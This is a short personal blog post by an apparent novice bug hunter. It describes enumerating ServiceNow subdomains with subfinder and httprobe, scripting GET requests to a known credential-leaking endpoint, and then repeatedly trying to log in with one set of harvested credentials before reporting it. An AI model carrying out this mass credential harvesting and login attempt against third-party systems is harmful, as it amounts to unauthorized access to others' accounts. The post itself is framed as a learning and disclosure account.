After I reading the blog post on PostSwigger about ServiceNow admin credentials being exposed, I started to wonder if all the credentials have been gathered. I get to work without a moment’s delay, but I realized that I didn’t know how to find subdomains. All I know is, there can be some login credentials on *.service-now.com/HelpTheHelpdesk.jsdbx. I visualized all the steps in my mind.
I have to find the subdomains. ( *.service-now.com). And then send a GET request to /HelpTheHelpdesk.jsdbx endpoint to check the response automatically. The most challenging part of this process was automating the GET request and checking the response.
After quick research, I found subfinder and cloned it. I ran the command below.
subfinder -d service-now.com -o subdomains.txt
But there was a problem that I didn’t know. Not all the subdomains were live and it was impossible to manually determine which ones were live.
`httprobe` save the situation. I gave the subdomains.txt to httprobe and it created a new file called livesubdomains.txt with only the live subdomains.
How would I send a GET request to the endpoint and check the response? I didn’t know though. I Googled it and write my own script with the help of a python request library.
I know that the code is neither the fastest nor efficient one but at least it’s working as intented. I would appreciate any feedback or suggestions you may have.
I receivedmultiple responses that include httpPassword = keyword. But, all except one had empty credentials. httpPassword= ““ and httpUsername = ““. All of these credentials were deleted except one.
No matter how many times I tried to login with these credentials, unfortunately I couldn’t login successfully. Nevertheless, I prepared a proper report and sent it.
I was not the person who discovered that vulnerability, but I wish I were. I learned a lot from the experience and I always strive to learn and share what I know. If you have any feedback, feel free to reach out to me.
